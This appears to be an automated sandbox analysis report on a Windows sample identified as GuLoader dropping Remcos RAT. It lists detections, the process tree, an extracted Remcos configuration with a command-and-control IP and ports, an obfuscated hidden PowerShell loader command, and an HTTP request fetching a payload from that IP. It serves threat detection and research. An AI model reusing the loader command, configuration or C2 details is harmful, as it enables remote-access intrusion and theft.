Edit tour

Windows Analysis Report
Q20240425 MAX5073626.com.exe

Overview

General Information

Sample name:	Q20240425 MAX5073626.com.exe
Analysis ID:	1431846
MD5:	1c089552c29f12843d8cd8e2bbf5cf5b
SHA1:	6f3e611fc7d7d5938b99575bcd96366d6e213eab
SHA256:	76dbfa281b158a18c83d08a907f087b7330da28bdd2298eb9ee2f23c1df40491
Tags:	exe
Infos:

Detection

Remcos, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected Remcos RAT

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Remcos

Yara detected GuLoader

Yara detected Remcos RAT

C2 URLs / IPs found in malware configuration

Connects to many ports of the same IP (likely port scanning)

Found suspicious powershell code related to unpacking or dynamic code loading

Obfuscated command line found

Powershell drops PE file

Suspicious powershell command line found

Writes to foreign memory regions

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evaded block containing many API calls

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Potential Dosfuscation Activity

Sleep loop found (likely to delay execution)

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Q20240425 MAX5073626.com.exe (PID: 6544 cmdline: "C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe" MD5: 1C089552C29F12843D8CD8E2BBF5CF5B)

powershell.exe (PID: 6636 cmdline: "powershell" -windowstyle hidden "$Annotationerne139=cat 'C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\dannelsestrinnet.Sta';$Rhinocerotiform=$Annotationerne139.substring(32760,3);.$Rhinocerotiform($Annotationerne139)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7096 cmdline: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

wab.exe (PID: 3844 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/ https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "193.239.86.203:3702:1193.239.86.203:4089:1193.239.86.203:4093:1193.239.86.203:2700:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-UI3GST", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000007.00000002.2923725946.0000000006DE1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000007.00000002.2923725946.0000000006DEF000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000001.00000002.2195976842.000000000A319000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: wab.exe PID: 3844	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security

Sigma Signatures

System Summary

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6636, TargetFilename: C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Licente\Q20240425 MAX5073626.com.exe

Sigma detected: Potential Dosfuscation Activity

Source: Process started

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0", CommandLine: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "powershell" -windowstyle hidden "$Annotationerne139=cat 'C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\dannelsestrinnet.Sta';$Rhinocerotiform=$Annotationerne139.substring(32760,3);.$Rhinocerotiform($Annotationerne139)", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6636, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0", ProcessId: 7096, ProcessName: cmd.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -windowstyle hidden "$Annotationerne139=cat 'C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\dannelsestrinnet.Sta';$Rhinocerotiform=$Annotationerne139.substring(32760,3);.$Rhinocerotiform($Annotationerne139)", CommandLine: "powershell" -windowstyle hidden "$Annotationerne139=cat 'C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\dannelsestrinnet.Sta';$Rhinocerotiform=$Annotationerne139.substring(32760,3);.$Rhinocerotiform($Annotationerne139)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe", ParentImage: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe, ParentProcessId: 6544, ParentProcessName: Q20240425 MAX5073626.com.exe, ProcessCommandLine: "powershell" -windowstyle hidden "$Annotationerne139=cat 'C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\dannelsestrinnet.Sta';$Rhinocerotiform=$Annotationerne139.substring(32760,3);.$Rhinocerotiform($Annotationerne139)", ProcessId: 6636, ProcessName: powershell.exe

Stealing of Sensitive Information

Sigma detected: Remcos

Source: Registry Key set

Author: Joe Security: Data: Details: BD FD BB C6 BA E4 28 8F B3 3F 05 34 5E 76 16 7A 83 04 08 79 5A 23 FD 1C AF B4 67 84 DF EC 56 44 DA C5 4E F4 A0 C2 D5 17 77 E0 72 AF 73 91 8D B4 A1 C4 91 AA 32 8E A9 92 93 37 71 F7 8F D8 EE 33 3F 74 76 3A DC 09 33 29 85 06 75 E1 7F 2A 2B 7A F8 F3 B7 B2 D2 D0 1F 60 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Windows Mail\wab.exe, ProcessId: 3844, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-UI3GST\exepath

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png	URL Reputation: Label: malware
Source: http://pesterbdd.com/images/Pester.png	URL Reputation: Label: malware

Found malware configuration

Source: 00000007.00000002.2923725946.0000000006DEF000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Remcos {"Host:Port:Password": "193.239.86.203:3702:1193.239.86.203:4089:1193.239.86.203:4093:1193.239.86.203:2700:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-UI3GST", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Licente\Q20240425 MAX5073626.com.exe	ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Licente\Q20240425 MAX5073626.com.exe	Virustotal: Detection: 20%			Perma Link

Multi AV Scanner detection for submitted file

Source: Q20240425 MAX5073626.com.exe	ReversingLabs: Detection: 13%
Source: Q20240425 MAX5073626.com.exe	Virustotal: Detection: 21%			Perma Link

Yara detected Remcos RAT

Source: Yara match	File source: 00000007.00000002.2923725946.0000000006DE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2923725946.0000000006DEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 3844, type: MEMORYSTR

Source: Q20240425 MAX5073626.com.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Q20240425 MAX5073626.com.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.2191279426.0000000007152000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.Core.pdbMn source: powershell.exe, 00000001.00000002.2195123404.00000000083B7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5O source: powershell.exe, 00000001.00000002.2185997052.0000000002CB1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: lambda_methodCore.pdbt/ source: powershell.exe, 00000001.00000002.2195123404.00000000083B7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 00000001.00000002.2191279426.0000000007152000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	Code function: 0_2_00402B75 FindFirstFileW,	0_2_00402B75
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	Code function: 0_2_0040673F GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_0040673F
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	Code function: 0_2_004065F5 FindFirstFileW,FindClose,	0_2_004065F5

Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts	Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 193.239.86.203

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 193.239.86.203 ports 4089,4093,0,2700,8,80,3702

Source: global traffic

TCP traffic: 192.168.2.4:49738 -> 193.239.86.203:4089

Source: Joe Sandbox View

ASN Name: MERITAPL MERITAPL

Source: global traffic

HTTP traffic detected: GET /XWJPh99.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 193.239.86.203Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.86.203

Source: global traffic

HTTP traffic detected: GET /XWJPh99.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 193.239.86.203Cache-Control: no-cache

Source: wab.exe, 00000007.00000002.2923725946.0000000006D88000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.2923725946.0000000006DE1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.2924069038.0000000007000000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://193.239.86.203/XWJPh99.bin
Source: wab.exe, 00000007.00000002.2923725946.0000000006DE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.239.86.203/XWJPh99.binW
Source: Q20240425 MAX5073626.com.exe, Q20240425 MAX5073626.com.exe.1.dr	String found in binary or memory: http://nsis.sf.net/NSIS_Error...
Source: powershell.exe, 00000001.00000002.2189367167.0000000005B37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.2186655798.0000000004C26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.2186655798.0000000004AD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.2186655798.0000000004C26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.2186655798.0000000004AD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000001.00000002.2189367167.0000000005B37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.2189367167.0000000005B37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.2189367167.0000000005B37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.2186655798.0000000004C26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2189367167.0000000005B37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe

Code function: 0_2_00404B65 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00404B65

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 00000007.00000002.2923725946.0000000006DE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2923725946.0000000006DEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 3844, type: MEMORYSTR

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Licente\Q20240425 MAX5073626.com.exe

Jump to dropped file

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 7_2_0583D53D Sleep,NtProtectVirtualMemory,

7_2_0583D53D

Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe

Code function: 0_2_004036D7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,

0_2_004036D7

Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe

File created: C:\Windows\resources\0809

Jump to behavior

Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	Code function: 0_2_00407146	0_2_00407146
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	Code function: 0_2_00404453	0_2_00404453
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0462F000	1_2_0462F000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0462F8D0	1_2_0462F8D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0462ECB8	1_2_0462ECB8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_074EBB58	1_2_074EBB58

Source: Q20240425 MAX5073626.com.exe	Static PE information: Resource name: RT_VERSION type: 0420 Alliant virtual executable common library not stripped
Source: Q20240425 MAX5073626.com.exe.1.dr	Static PE information: Resource name: RT_VERSION type: 0420 Alliant virtual executable common library not stripped

Source: Q20240425 MAX5073626.com.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.evad.winEXE@8/11@0/1

Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe

0_2_004036D7

Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe

Code function: 0_2_004040BA GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,EnableWindow,

0_2_004040BA

Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe

Code function: 0_2_0040234F CoCreateInstance,

0_2_0040234F

Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe

File created: C:\Users\user\AppData\Local\Radioactinium

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6664:120:WilError_03
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-UI3GST

Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe

File created: C:\Users\user\AppData\Local\Temp\nstD63D.tmp

Jump to behavior

Source: Q20240425 MAX5073626.com.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process

Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Q20240425 MAX5073626.com.exe	ReversingLabs: Detection: 13%
Source: Q20240425 MAX5073626.com.exe	Virustotal: Detection: 21%

Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe

File read: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe "C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe"
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -windowstyle hidden "$Annotationerne139=cat 'C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\dannelsestrinnet.Sta';$Rhinocerotiform=$Annotationerne139.substring(32760,3);.$Rhinocerotiform($Annotationerne139)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -windowstyle hidden "$Annotationerne139=cat 'C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\dannelsestrinnet.Sta';$Rhinocerotiform=$Annotationerne139.substring(32760,3);.$Rhinocerotiform($Annotationerne139)"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	Section loaded: textinputframework.dll	Jump to behavior
